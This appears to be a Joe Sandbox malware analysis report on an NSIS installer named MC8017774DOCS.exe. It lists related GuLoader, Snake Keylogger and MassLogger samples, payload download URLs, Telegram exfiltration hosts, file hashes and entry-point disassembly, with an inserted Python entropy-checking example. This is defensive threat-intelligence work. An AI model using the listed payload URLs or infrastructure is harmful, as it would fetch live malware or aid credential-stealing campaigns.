                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                          Report type:full
                                                                                                          Cookbook file name:default.jbs
                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                          Number of analysed new started processes analysed:5
                                                                                                          Number of new started drivers analysed:0
                                                                                                          Number of existing processes analysed:0
                                                                                                          Number of existing drivers analysed:0
                                                                                                          Number of injected processes analysed:0
                                                                                                          Technologies:
                                                                                                          • HCA enabled
                                                                                                          • EGA enabled
                                                                                                          • AMSI enabled
                                                                                                          Analysis Mode:default
                                                                                                          Analysis stop reason:Timeout
                                                                                                          Sample name:MC8017774DOCS.exe
                                                                                                          Detection:MAL
                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@3/5@5/5
                                                                                                          EGA Information:
                                                                                                          • Successful, ratio: 100%
                                                                                                          HCA Information:
                                                                                                          • Successful, ratio: 89%
                                                                                                          • Number of executed functions: 45
                                                                                                          • Number of non-executed functions: 34
                                                                                                          Cookbook Comments:
                                                                                                          • Found application associated with file extension: .exe
                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
01:09:56 | API Interceptor | 32344x Sleep call for process: MC8017774DOCS.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
132.226.8.169 | Papyment_Advice.exe | malicious | MassLogger RAT | checkip.dyndns.org/
132.226.8.169 | PO #09465610_GQ 003745_SO-242000846.exe | malicious | MassLogger RAT, PureLog Stealer | checkip.dyndns.org/
132.226.8.169 | sosoliso.exe | malicious | MassLogger RAT | checkip.dyndns.org/
132.226.8.169 | order requirements CIF-TRC809945210.exe | malicious | GuLoader | checkip.dyndns.org/
132.226.8.169 | STAFF RECORD_pdf.arj.exe | malicious | Unknown | checkip.dyndns.org/
132.226.8.169 | PayeeAdvice_HK54912_R0038704_37504.exe | malicious | GuLoader, Snake Keylogger | checkip.dyndns.org/
132.226.8.169 | Xkl0PnD8zFPjfh1.wiz.rtf | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
132.226.8.169 | Ref#501032.vbe | malicious | MassLogger RAT | checkip.dyndns.org/
132.226.8.169 | GD7656780000.bat.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
132.226.8.169 | 01831899-1 FDMS3008SDC.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
149.154.167.220 | Shave.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger |
149.154.167.220 | PaymentAdvice.exe | malicious | GuLoader, Snake Keylogger |
149.154.167.220 | S50MC-C_3170262-7.6cylinder_liner.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger |
149.154.167.220 | DESIGN LOGO.exe | malicious | AgentTesla |
149.154.167.220 | ZEcVl5jzXD.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | WV7Gj9lJ7W.exe | malicious | XWorm |
149.154.167.220 | 18sFhgSyVK.exe | malicious | XWorm |
149.154.167.220 | SystemCoreHelper.dll | malicious | LummaC Stealer |
149.154.167.220 | file.exe | malicious | Unknown |
149.154.167.220 | sosoliso.exe | malicious | MassLogger RAT |
185.244.144.68 | Shave.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | mertvinc.com.tr/oxzGOftLtQcGlWZ214.bin
185.244.144.68 | New listed items 7648767856387547354734567465647568487.exe | malicious | Discord Token Stealer, GuLoader | mertvinc.com.tr/TPwPATw126.bin
185.244.144.68 | yVVZdG2NJX.exe | malicious | GuLoader | mertvinc.com.tr/SJatcRCUnkMIpuGcrVu155.bin
185.244.144.68 | WC10SCPMaX.exe | malicious | Azorult, GuLoader | mertvinc.com.tr/fRzMqN204.bin
185.244.144.68 | MG-Docu6800001.exe | malicious | GuLoader | mertvinc.com.tr/LAbxmTzNBCWjnKNdG58.bin
185.244.144.68 | CL714440147.exe | malicious | GuLoader | mertvinc.com.tr/LAbxmTzNBCWjnKNdG58.bin
185.244.144.68 | TKnBbCiX07.exe | malicious | GuLoader | mertvinc.com.tr/LAbxmTzNBCWjnKNdG58.bin
185.244.144.68 | Snurrevoddenes.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | mertvinc.com.tr/fYJJzdXnGgCBdwfMZh209.bin
185.244.144.68 | Eksistensberettigelsernes102.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | mertvinc.com.tr/fYJJzdXnGgCBdwfMZh209.bin
185.244.144.68 | 7000091945.xlsx.exe | malicious | Azorult, GuLoader | mertvinc.com.tr/OGDTCbBRybqnXF193.bin
Match | Associated Sample Name / URL | Detection | Threat Name | Context
mertvinc.com.tr | Shave.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 185.244.144.68
mertvinc.com.tr | New listed items 7648767856387547354734567465647568487.exe | malicious | Discord Token Stealer, GuLoader | 185.244.144.68
mertvinc.com.tr | yVVZdG2NJX.exe | malicious | GuLoader | 185.244.144.68
mertvinc.com.tr | WC10SCPMaX.exe | malicious | Azorult, GuLoader | 185.244.144.68
mertvinc.com.tr | Conchoids12.exe | malicious | GuLoader | 185.244.144.68
mertvinc.com.tr | Korrekturlsning.exe | malicious | GuLoader | 185.244.144.68
mertvinc.com.tr | Conchoids12.exe | malicious | GuLoader | 185.244.144.68
mertvinc.com.tr | Korrekturlsning.exe | malicious | GuLoader | 185.244.144.68
mertvinc.com.tr | MG-Docu6800001.exe | malicious | GuLoader | 185.244.144.68
mertvinc.com.tr | CL714440147.exe | malicious | GuLoader | 185.244.144.68
api.telegram.org | Shave.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | rorderrequirementsCIF-TRC809910645210.exe | malicious | Snake Keylogger | 149.154.167.220
api.telegram.org | PaymentAdvice.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
api.telegram.org | S50MC-C_3170262-7.6cylinder_liner.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | DESIGN LOGO.exe | malicious | AgentTesla | 149.154.167.220
api.telegram.org | ZEcVl5jzXD.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | WV7Gj9lJ7W.exe | malicious | XWorm | 149.154.167.220
api.telegram.org | 18sFhgSyVK.exe | malicious | XWorm | 149.154.167.220
api.telegram.org | SystemCoreHelper.dll | malicious | LummaC Stealer | 149.154.167.220
api.telegram.org | file.exe | malicious | Unknown | 149.154.167.220
checkip.dyndns.com | Shave.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 193.122.130.0
checkip.dyndns.com | New shipment AWB NO - 09804480383.exe | malicious | PureLog Stealer, Snake Keylogger | 132.226.247.73
checkip.dyndns.com | rorderrequirementsCIF-TRC809910645210.exe | malicious | Snake Keylogger | 132.226.247.73
checkip.dyndns.com | PaymentAdvice.exe | malicious | GuLoader, Snake Keylogger | 132.226.247.73
checkip.dyndns.com | S50MC-C_3170262-7.6cylinder_liner.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 132.226.247.73
checkip.dyndns.com | ZEcVl5jzXD.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.6.168
checkip.dyndns.com | Papyment_Advice.exe | malicious | MassLogger RAT | 132.226.8.169
checkip.dyndns.com | PO #09465610_GQ 003745_SO-242000846.exe | malicious | MassLogger RAT, PureLog Stealer | 132.226.8.169
checkip.dyndns.com | sosoliso.exe | malicious | MassLogger RAT | 132.226.8.169
checkip.dyndns.com | rrequestforquotation.exe | malicious | Snake Keylogger | 193.122.6.168
reallyfreegeoip.org | Shave.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 172.67.177.134
reallyfreegeoip.org | New shipment AWB NO - 09804480383.exe | malicious | PureLog Stealer, Snake Keylogger | 172.67.177.134
reallyfreegeoip.org | rorderrequirementsCIF-TRC809910645210.exe | malicious | Snake Keylogger | 104.21.67.152
reallyfreegeoip.org | PaymentAdvice.exe | malicious | GuLoader, Snake Keylogger | 104.21.67.152
reallyfreegeoip.org | S50MC-C_3170262-7.6cylinder_liner.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 104.21.67.152
reallyfreegeoip.org | ZEcVl5jzXD.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.67.152
reallyfreegeoip.org | Papyment_Advice.exe | malicious | MassLogger RAT | 104.21.67.152
reallyfreegeoip.org | PO #09465610_GQ 003745_SO-242000846.exe | malicious | MassLogger RAT, PureLog Stealer | 104.21.67.152
reallyfreegeoip.org | sosoliso.exe | malicious | MassLogger RAT | 172.67.177.134
                                                                                                                              rrequestforquotation.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                              • 172.67.177.134
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: BIRBIRTR
  Shave.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 185.244.144.68
  New listed items 7648767856387547354734567465647568487.exe | malicious | Discord Token Stealer, GuLoader | 185.244.144.68
  yVVZdG2NJX.exe | malicious | GuLoader | 185.244.144.68
  WC10SCPMaX.exe | malicious | Azorult, GuLoader | 185.244.144.68
  Conchoids12.exe | malicious | GuLoader | 185.244.144.68
  Korrekturlsning.exe | malicious | GuLoader | 185.244.144.68
  Conchoids12.exe | malicious | GuLoader | 185.244.144.68
  Korrekturlsning.exe | malicious | GuLoader | 185.244.144.68
  MG-Docu6800001.exe | malicious | GuLoader | 185.244.144.68
  CL714440147.exe | malicious | GuLoader | 185.244.144.68
Match: TELEGRAMRU
  Shave.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 149.154.167.220
  PaymentAdvice.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
  S50MC-C_3170262-7.6cylinder_liner.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 149.154.167.220
  DESIGN LOGO.exe | malicious | AgentTesla | 149.154.167.220
  ZEcVl5jzXD.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
  WV7Gj9lJ7W.exe | malicious | XWorm | 149.154.167.220
  18sFhgSyVK.exe | malicious | XWorm | 149.154.167.220
  21Installer.exe | malicious | Stealc, Vidar | 149.154.167.99
  SystemCoreHelper.dll | malicious | LummaC Stealer | 149.154.167.220
  file.exe | malicious | Unknown | 149.154.167.220
Match: UTMEMUS
  New shipment AWB NO - 09804480383.exe | malicious | PureLog Stealer, Snake Keylogger | 132.226.247.73
  rorderrequirementsCIF-TRC809910645210.exe | malicious | Snake Keylogger | 132.226.247.73
  PaymentAdvice.exe | malicious | GuLoader, Snake Keylogger | 132.226.247.73
  S50MC-C_3170262-7.6cylinder_liner.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 132.226.247.73
  Papyment_Advice.exe | malicious | MassLogger RAT | 132.226.8.169
  mips.nn.elf | malicious | Mirai, Okiru | 132.226.51.241
  sparc.nn.elf | malicious | Mirai, Okiru | 128.169.54.96
  PO #09465610_GQ 003745_SO-242000846.exe | malicious | MassLogger RAT, PureLog Stealer | 132.226.8.169
  http://mweb.webhop.org | malicious | HTMLPhisher | 132.226.118.109
  sosoliso.exe | malicious | MassLogger RAT | 132.226.8.169
Match: SKB-ENTERPRISENL
  bot_library.exe | malicious | Unknown | 45.148.121.112
  bot_library.exe | malicious | Unknown | 45.148.121.112
  i3LQkjkqOB.elf | malicious | Gafgyt, Mirai | 45.148.121.112
  grjD7lWffX.elf | malicious | Gafgyt, Mirai | 45.148.121.112
  systemd-udevd (deleted) | malicious | Unknown | 45.148.120.142
  systemd-udevd (deleted) | malicious | Unknown | 45.148.120.142
  configs.conf | malicious | Unknown | 45.148.120.142
  configs.conf | malicious | Unknown | 45.148.120.142
  Inquiry HA-22-28199 22-Q22024.doc | malicious | FormBook | 45.148.122.66
  Inquiry HA-22-28199 22-Q22024.doc | malicious | FormBook | 45.148.122.66
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: 54328bd36c14bd82ddaa0c04b25ed9ad
  Pigroots.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 172.67.177.134
  Shave.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 172.67.177.134
  New shipment AWB NO - 09804480383.exe | malicious | PureLog Stealer, Snake Keylogger | 172.67.177.134
  rorderrequirementsCIF-TRC809910645210.exe | malicious | Snake Keylogger | 172.67.177.134
  PaymentAdvice.exe | malicious | GuLoader, Snake Keylogger | 172.67.177.134
  S50MC-C_3170262-7.6cylinder_liner.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 172.67.177.134
  ZEcVl5jzXD.exe | malicious | Snake Keylogger, VIP Keylogger | 172.67.177.134
  Papyment_Advice.exe | malicious | MassLogger RAT | 172.67.177.134
  file.exe | malicious | Amadey, Credential Flusher, Cryptbot, JasonRAT, LummaC Stealer, Stealc, Vidar | 172.67.177.134
  https://docs.google.com/drawings/d/15fSe2159qP21C2NrS3K5cgcsyPwNINvux6xIUCvvgBU/preview?pli=1AmyVazquez-brian.nester@lvhn.org | malicious | HTMLPhisher | 172.67.177.134
Match: 3b5074b1b5d032e5620f69f9f700ff0e
  Pigroots.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 149.154.167.220
  Shave.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 149.154.167.220
  202411_257658·pdf.vbs | malicious | Unknown | 149.154.167.220
  file.exe | malicious | LummaC Stealer | 149.154.167.220
  file.exe | malicious | LummaC Stealer | 149.154.167.220
  file.exe | malicious | LummaC Stealer | 149.154.167.220
  0Nj1sxmCtr.exe | malicious | Binder HackTool, Quasar | 149.154.167.220
  FW EBS - Goods for M-PROJECTS - PROFORMA - PAYMENT - SWIFT - DELIVERY ORDER NO. INM303.exe | malicious | Unknown | 149.154.167.220
  FW EBS - Goods for M-PROJECTS - PROFORMA - PAYMENT - SWIFT - DELIVERY ORDER NO. INM303.exe | malicious | Unknown | 149.154.167.220
  PaymentAdvice.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
Match | Associated Sample Name / URL | Detection | Threat Name
Match: C:\Users\user\AppData\Local\Temp\nse865B.tmp\System.dll
  Pigroots.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger
  SİPARİŞ No.112024-pdf.bat.exe | malicious | FormBook, GuLoader
  Shave.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger
  Readouts.bat.exe | malicious | GuLoader
  New listed items 7648767856387547354734567465647568487.exe | malicious | Discord Token Stealer, GuLoader
  yVVZdG2NJX.exe | malicious | GuLoader
  PaymentAdvice.exe | malicious | GuLoader, Snake Keylogger
  S50MC-C_3170262-7.6cylinder_liner.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger
  ORDER 20240986 OA.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger
  PayeeAdvice_HK54912_R0038704_37504.exe | malicious | GuLoader, Snake Keylogger
Process:C:\Users\user\Desktop\MC8017774DOCS.exe
File Type:DIY-Thermocam raw data (Lepton 2.x), scale 0-12, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 649037107316853453566312041152512.000000
Category:dropped
Size (bytes):286686
Entropy (8bit):1.2536158727628404
Encrypted:false
SSDEEP:768:3zbnVKpXfwz53wppkaub35azZSECekyln9KUXjJrv5YQ1ujVNDYb3ezsIhWCUiSL:KH4hI9iE3sLB9pXYzlkOYFWf9
MD5:99A5E2E2953D0374F1E23FF8B0B6773F
SHA1:5FC3F9C3638DD60012AB2F2ECDD016912BBDB9F3
SHA-256:3D1233CB89AD10CCC6972697279A3741F6031E05D32738E9B34D37A230C0F84A
SHA-512:1B002C12EAB187B0246483C5F3B0758DC84BCC884E1120A17B0412DFD349972DB5DA04E154AE21D405BA33BBD0C29AADFA7D1BF4D50347146D6DFCCBBD8DA94A
Malicious:false
Reputation:moderate, very likely benign file
Process:C:\Users\user\Desktop\MC8017774DOCS.exe
File Type:data
Category:dropped
Size (bytes):472868
Entropy (8bit):6.917253204664265
Encrypted:false
SSDEEP:6144:oOotBmbqGe04Asl7ACPHaycaSErvJSciCc/tBfa:oOBbTF4Ac7VaBapvwVVI
MD5:1603919560ECC0C67267F4D26AE182E8
SHA1:A0A4AE2FEDCB69A48822619E38E35BB243AB4307
SHA-256:9DE7EFD6B560857516E450DB3D6B99FCD528CE84081CC24C0D25EE07DB04825B
SHA-512:5BBA9408A51734E5F9E3F03E4553CDF7AD617675C1494D24366F7C4989D08FB879EA2D8EE6392196385AF7D75090DB36807D2633E5AC72F33FC382D84EF75A3A
Malicious:false
Reputation:low
                                                                                                                                                  Process:C:\Users\user\Desktop\MC8017774DOCS.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):73531
                                                                                                                                                  Entropy (8bit):1.2569404898190384
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:dVICOgr5CpPXeGASSCorJvHtPvpwqcQ+5pPZg71l4oLuZK52Oc410+RaL7VomsEa:dVcPX7U1R9mPZgx1hn32+emD40rd
                                                                                                                                                  MD5:22148562A5A87FF1BECCAE5E77D87142
                                                                                                                                                  SHA1:D1B04F09ACFC146855AA02A8C530AA8A45DF3F24
                                                                                                                                                  SHA-256:B09EF713D0920E9671DA35332C6DAE7C1E12BE409A7077D6CA3E07938F9C08E9
                                                                                                                                                  SHA-512:3F96B2ABED75C8EA941E45BB3835EF4D5FC92C5C5F829A738641FD398D88BB838E7C22A0F5F998BF387A5CE4ADC77EECAA049BCFB1A9ADD476871C871D58E811
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  Preview:......................................................................................x..........................|........................................l...................a.........................................U.....................k..........................................G..................................................................|.....b....................O...R..........n...................&.....................l..................!.......6......... ......S.......................................}........................................7..................................................................................................................................................B......#......b....................60........?.....z.......>..........................:..............%..l...........g...........................=D.....{.....................................&........................{.......................i..........................................5.]............
                                                                                                                                                  Process:C:\Users\user\Desktop\MC8017774DOCS.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):220203
                                                                                                                                                  Entropy (8bit):1.262001836842358
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:768:EBCX3JLNVpAeI+EgywY0Szqqv3ib1RuU7thllrhAKF3+O1jaJgMH8JHuHR6qTSIT:EkLjwqF1z1MoqyH
                                                                                                                                                  MD5:F8A828CA56113806A25802FF2AF74282
                                                                                                                                                  SHA1:B016C4258BD1F9A19989E0C6B7AB993ED02DF96F
                                                                                                                                                  SHA-256:95941451FFB946693877FBD721001ACC32FE70D75EA68CAB1756B3ADF77DCFF4
                                                                                                                                                  SHA-512:6725AA09040FAC962CCFF2EF9897FB6F3F3706FE60D8C55A69CB9E0C21362B3C8C186C573D647C0A50438686D6035361A4A20138C451E641D507BD1218D1E079
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  Preview:...................................................@......................................................................<....................................................O....../..........T.....................................i................................................................,.......................t.....................t.................................{!...................................................................................................X..........s.............@.............C....2................................-..............................w..............................................................H....................I........."..................C.................a................p...6.......................'......................................................................................%.............................x.................Q...................................z..........................i....hv...x.................`..........c.
                                                                                                                                                  Process:C:\Users\user\Desktop\MC8017774DOCS.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):11776
                                                                                                                                                  Entropy (8bit):5.890541747176257
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:X24sihno0bW+l97H4GB7QDs91kMtwtobTr4u+QHbazMNHT7dmNIEr:m8vJl97JeoxtN/r3z7YV
                                                                                                                                                  MD5:75ED96254FBF894E42058062B4B4F0D1
                                                                                                                                                  SHA1:996503F1383B49021EB3427BC28D13B5BBD11977
                                                                                                                                                  SHA-256:A632D74332B3F08F834C732A103DAFEB09A540823A2217CA7F49159755E8F1D7
                                                                                                                                                  SHA-512:58174896DB81D481947B8745DAFE3A02C150F3938BB4543256E8CCE1145154E016D481DF9FE68DAC6D48407C62CBE20753320EBD5FE5E84806D07CE78E0EB0C4
                                                                                                                                                  Malicious:false
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                   • Filename: Pigroots.exe, Detection: malicious
                                                                                                                                                   • Filename: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, Detection: malicious
                                                                                                                                                   • Filename: Shave.exe, Detection: malicious
                                                                                                                                                   • Filename: Readouts.bat.exe, Detection: malicious
                                                                                                                                                   • Filename: New listed items 7648767856387547354734567465647568487.exe, Detection: malicious
                                                                                                                                                   • Filename: yVVZdG2NJX.exe, Detection: malicious
                                                                                                                                                   • Filename: PaymentAdvice.exe, Detection: malicious
                                                                                                                                                   • Filename: S50MC-C_3170262-7.6cylinder_liner.exe, Detection: malicious
                                                                                                                                                   • Filename: ORDER 20240986 OA.exe, Detection: malicious
                                                                                                                                                   • Filename: PayeeAdvice_HK54912_R0038704_37504.exe, Detection: malicious
                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....oZ...........!..... ...........).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...x....@.......(..............@....reloc..~....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
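Each dropped-file record above carries a size, an "Entropy (8bit)" value and MD5/SHA1/SHA-256/SHA-512 digests. As an added example (not part of the Joe Sandbox report and not Joe Sandbox code), the Python below reproduces those fields for an in-memory buffer and shows why near-null data such as the two files above with entropy 1.26 scores so low while compressed or encrypted content scores close to 8. The two sample buffers, the upper-cased digests and the verdict thresholds are constructed for this example.

```python
"""Added example (not from the Joe Sandbox report): compute the per-file
fields a dropped-file record carries and read its 8-bit entropy."""
import hashlib
import math
import random
from collections import Counter


def entropy_8bit(data):
    """Shannon entropy in bits per byte: 0.0 for one repeated byte value,
    8.0 when all 256 values are equally frequent."""
    if not data:
        return 0.0
    total = len(data)
    return -sum(c / total * math.log2(c / total) for c in Counter(data).values())


def file_fields(data):
    """The fields listed per dropped file: size, entropy, digests, PE check."""
    return {
        "Size (bytes)": len(data),
        "Entropy (8bit)": entropy_8bit(data),
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
        "SHA-512": hashlib.sha512(data).hexdigest().upper(),
        "PE": data[:2] == b"MZ",
    }


def entropy_verdict(h):
    """Triage heuristic; the thresholds are an assumption, not report values."""
    if h < 2.0:
        return "sparse: mostly one byte value, e.g. null-padded data"
    if h > 7.0:
        return "dense: compressed, encrypted or packed content"
    return "mixed: typical of plain code and text"


def constructed_samples():
    """Two constructed buffers: a null-dominated one sized like the 73531-byte
    dropped file above, and a uniformly random one (seeded for repeatability)."""
    rng = random.Random(1)
    sparse = bytearray(73531)
    for _ in range(4000):
        sparse[rng.randrange(len(sparse))] = rng.randrange(1, 256)
    dense = bytes(rng.randrange(256) for _ in range(4096))
    return bytes(sparse), dense


if __name__ == "__main__":
    for name, buf in zip(("sparse", "dense"), constructed_samples()):
        fields = file_fields(buf)
        print(name, fields["Size (bytes)"], round(fields["Entropy (8bit)"], 3),
              entropy_verdict(fields["Entropy (8bit)"]), fields["MD5"])
```

Entropy is a sorting aid, not a verdict: the 1.26 values above are consistent with null-padded data, and the 7.75 of the installer itself is consistent with a compressed NSIS payload, but only the dynamic analysis says what either actually does.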
                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                  Entropy (8bit):7.748269107029679
                                                                                                                                                  TrID:
                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                  File name:MC8017774DOCS.exe
                                                                                                                                                  File size:567'152 bytes
                                                                                                                                                  MD5:d4c19e96d83bd586016a3be2e3a57f1d
                                                                                                                                                  SHA1:bf5d7271766db9b568ac98006c7eda0de40bc2bd
                                                                                                                                                  SHA256:5cba2773587387ad35e187bf5135467da368909ae0d4dd1a0f1d80be6338fc44
                                                                                                                                                  SHA512:03078c41d61c02c1f8f7d34c4b93ac4d534a26c4d3dd28c04102d7f10b2eecea6499b38e0a87db0447314b3ca1f097f02d1c7ebd5d3fa994d9708d86df9f9c62
                                                                                                                                                  SSDEEP:12288:32EIMY+ov3ZXExuA5lpKHHtmZxxNQicmd3ZhZF:3w9+U36t5lAnoZxbcmdPZF
                                                                                                                                                  TLSH:5FC4E050F25DE897F52725B14C7FD93015DAAB5C91A4820E329A7A1E68E335320AFF0F
                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....oZ.................d....:....
                                                                                                                                                  Icon Hash:38206a6a62666429
                                                                                                                                                  Entrypoint:0x40336c
                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                  Digitally signed:false
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                  Time Stamp:0x5A6FED1F [Tue Jan 30 03:57:19 2018 UTC]
                                                                                                                                                  TLS Callbacks:
                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                  OS Version Major:4
                                                                                                                                                  OS Version Minor:0
                                                                                                                                                  File Version Major:4
                                                                                                                                                  File Version Minor:0
                                                                                                                                                  Subsystem Version Major:4
                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                  Import Hash:b34f154ec913d2d2c435cbd644e91687
                                                                                                                                                  Instruction
                                                                                                                                                  sub esp, 000002D4h
                                                                                                                                                  push ebx
                                                                                                                                                  push esi
                                                                                                                                                  push edi
                                                                                                                                                  push 00000020h
                                                                                                                                                  pop edi
                                                                                                                                                  xor ebx, ebx
                                                                                                                                                  push 00008001h
                                                                                                                                                  mov dword ptr [esp+14h], ebx
                                                                                                                                                  mov dword ptr [esp+10h], 0040A2E0h
                                                                                                                                                  mov dword ptr [esp+1Ch], ebx
                                                                                                                                                  call dword ptr [004080A8h]
                                                                                                                                                  call dword ptr [004080A4h]
                                                                                                                                                  and eax, BFFFFFFFh
                                                                                                                                                  cmp ax, 00000006h
                                                                                                                                                  mov dword ptr [007A8A2Ch], eax
                                                                                                                                                  je 00007F56CD24B193h
                                                                                                                                                  push ebx
                                                                                                                                                  call 00007F56CD24E445h
                                                                                                                                                  cmp eax, ebx
                                                                                                                                                  je 00007F56CD24B189h
                                                                                                                                                  push 00000C00h
                                                                                                                                                  call eax
                                                                                                                                                  mov esi, 004082B0h
                                                                                                                                                  push esi
                                                                                                                                                  call 00007F56CD24E3BFh
                                                                                                                                                  push esi
                                                                                                                                                  call dword ptr [00408150h]
                                                                                                                                                  lea esi, dword ptr [esi+eax+01h]
                                                                                                                                                  cmp byte ptr [esi], 00000000h
                                                                                                                                                  jne 00007F56CD24B16Ch
                                                                                                                                                  push 0000000Ah
                                                                                                                                                  call 00007F56CD24E418h
                                                                                                                                                  push 00000008h
                                                                                                                                                  call 00007F56CD24E411h
                                                                                                                                                  push 00000006h
                                                                                                                                                  mov dword ptr [007A8A24h], eax
                                                                                                                                                  call 00007F56CD24E405h
                                                                                                                                                  cmp eax, ebx
                                                                                                                                                  je 00007F56CD24B191h
                                                                                                                                                  push 0000001Eh
                                                                                                                                                  call eax
                                                                                                                                                  test eax, eax
                                                                                                                                                  je 00007F56CD24B189h
                                                                                                                                                  or byte ptr [007A8A2Fh], 00000040h
                                                                                                                                                  push ebp
                                                                                                                                                  call dword ptr [00408044h]
                                                                                                                                                  push ebx
                                                                                                                                                  call dword ptr [004082A0h]
                                                                                                                                                  mov dword ptr [007A8AF8h], eax
                                                                                                                                                  push ebx
                                                                                                                                                  lea eax, dword ptr [esp+34h]
                                                                                                                                                  push 000002B4h
                                                                                                                                                  push eax
                                                                                                                                                  push ebx
                                                                                                                                                  push 0079FEE0h
                                                                                                                                                  call dword ptr [00408188h]
                                                                                                                                                  push 0040A2C8h
                                                                                                                                                  Programming Language:
                                                                                                                                                  • [EXP] VC++ 6.0 SP5 build 8804
